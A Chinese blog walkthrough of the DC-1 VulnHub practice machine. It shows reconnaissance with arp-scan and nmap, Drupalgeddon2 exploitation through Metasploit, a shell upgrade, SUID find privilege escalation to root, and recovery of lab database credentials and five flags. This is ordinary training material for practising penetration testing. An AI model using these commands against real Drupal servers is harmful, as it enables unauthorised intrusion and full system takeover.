当前位置：首页 > article >正文

DC‑1 靶机完整渗透思路 + 详细步骤（可直接复现）

article 2026/4/29 7:25:38

核心思路信息收集 → Drupal 远程代码执行 → 拿 Webshell → 数据库信息利用 → SUID 提权 → 拿 Root 与全部 Flag一、环境准备攻击机Kali LinuxNAT 模式靶机DC‑1VulnHub 下载NAT 模式目标拿下root 权限找到5 个 flag二、信息收集定位靶机端口服务1. 查看攻击机 IPifconfig2. 网段扫描找靶机 IParp-scan -l3. 端口与服务扫描nmap -A -T4 192.168.146.133开放端口22/tcp SSH80/tcp HTTPDrupal 7 CMS111/tcp rpcbind关键发现80 端口跑 Drupal 7存在 CVE‑2018‑7600Drupalgeddon2远程代码执行漏洞三、漏洞利用MSF 拿 Shell1. 启动 Metasploitmsfconsole2. 搜索并加载漏洞模块search drupal # 选择第1个exploit/unix/webapp/drupal_drupalgeddon2 use 13. 设置参数并执行1. set rhosts 192.168.146.128 # 靶机IP 2. set lhost 192.168.46.133 # 攻击机IP 3. run成功拿到Meterpreter 会话用户为www‑data低权限四、升级交互式 Shell1. shell 2. python -c import pty;pty.spawn(/bin/bash)得到稳定 bashwww-dataDC-1:/var/www$(这行命令是在渗透测试中把一个 “残缺的反向 Shell 升级成交互式 Bash” 的经典操作) 为什么要这么做你刚拿到的 Meterpreter / 反弹 Shell 有很多限制无法使用su/sudo切换用户无法运行vim/top这类需要终端的程序输入错误命令时CtrlC会直接把整个会话关掉没有命令行历史记录、Tab 补全执行这行命令后你会得到一个稳定的交互式 Shell能正常使用这些功能后面提权、操作靶机都会顺畅很多。五、SUID 提权获取 root 权限查找带 SUID 权限的可执行文件find / -perm -us -type f 2/dev/null关键发现/usr/bin/find带有 SUID 权限可用于提权。利用 find 命令提权# 创建临时文件 touch test.txt # 利用find执行/bin/sh获取root shell find . -name test.txt -exec /bin/sh \; # 验证权限 whoami输出root即提权成功终端提示符变为#。六、一次性获取全部 5 个 FlagFlag 1Web 根目录cd /var/www ls cat flag1.txtFlag 2Drupal 配置文件# 进入配置文件目录 cd /var/www/sites/default/ # 精准查看数据库信息和flag2 grep -E database|username|password|flag settings.php文件中包含数据库账号密码以及 Flag2 内容。关键信息数据库名drupaldb用户名dbuser密码R0ck3t直接输出 flag2 内容Flag 3MySQL 数据库登录数据库mysql -u dbuser -pR0ck3t drupaldb查看 users 表内容获取 flag3-- 查看所有表 show tables; -- 查看users表的完整内容按行显示方便阅读 select * from users\G输出内容中包含 flag3 的提示信息。退出数据库exitFlag 4普通用户目录cat /home/flag4/flag4.txt直接读取 flag4 内容。Flag 5Root 目录最终 Flagcat /root/thefinalflag.txt获取最终通关 Flag内容为 DC-1 的通关祝贺信息。

DC‑1 靶机完整渗透思路 + 详细步骤（可直接复现）

相关文章：

DC‑1 靶机完整渗透思路 + 详细步骤（可直接复现）

从自动驾驶到机器人：双目视差生成点云在实际项目里怎么用？

告别鬼影！用PyTorch复现动态场景HDR融合论文（附数据集构建与训练代码）

2026年热门会议纪要神器实测对比转写整理全维度比拼，差距竟然这么大

AWPortrait-Z问题解决：常见生成问题排查与优化技巧

如何3分钟搞定B站视频下载：DownKyi哔哩下载姬的终极免费方案

如何一键下载百度文库等30+文档平台？kill-doc脚本全攻略

Oumuamua-7b-RP实战教程：将自定义角色导出为JSON并在多端复用

如何从零打造你的第一把模块化机械键盘：HelloWord-Keyboard终极指南

为什么禁止我请求别的网站的接口？——跨域与CORS _

记忆碎片化测试标准：软件测试领域的新兴挑战与应对框架

通过受管控的控制平面加速商品陈列优化

05华夏之光永存・开源：黄大年茶思屋榜文解法「23期 5题」【分布式收发机设计专项完整解法】

429超过接口限频次数

GLM-Image自动化测试：使用PyTest确保模型稳定性

2026中小企业AI超级员工选型：5款工具实测指南

MusePublic Art Studio部署教程：国产昇腾910B芯片适配SDXL的可行性验证

【含最新安装包】小龙虾 AI OpenClaw v2.6.6 安装指南｜办公自动化神器

【稀缺首发】2024 Dev Containers兼容性矩阵图：Node.js 20/Python 3.12/Rust 1.78全版本支持状态+已验证镜像清单

艾体宝干货|【Redis实用技巧#17】语义缓存（Semantic Caching）：LLM 的第一道防线

Rust 操作 Redis 从入门到生产级应用

AI MV 高清无水印生成工具有哪些？零基础在线把歌曲做成 MV 的工具选择指南

盘点全球十大海底光缆，数字孪生赋能资产展示

# D3.js实战进阶：从基础图表到交互式数据仪表盘的全流程构建在现代前端开发中，**数据可视化已成为提升用户体验的核心能力之一

FlexASIO终极指南：如何为普通声卡免费获取专业级ASIO低延迟音频体验

别再手写过滤器！Spring Cloud Gateway 内置 30+ 个，少写 80% 重复代码

PySide6安装踩坑实录：手把手解决‘DLL load failed’等常见错误（Win10/Win11通用）

别再死磕欧拉角了！用MATLAB的quaternion函数搞定机器人/无人机姿态解算（附完整代码）

让微信小程序也能发PATCH

DeepSeek-V4 新手快速上手指南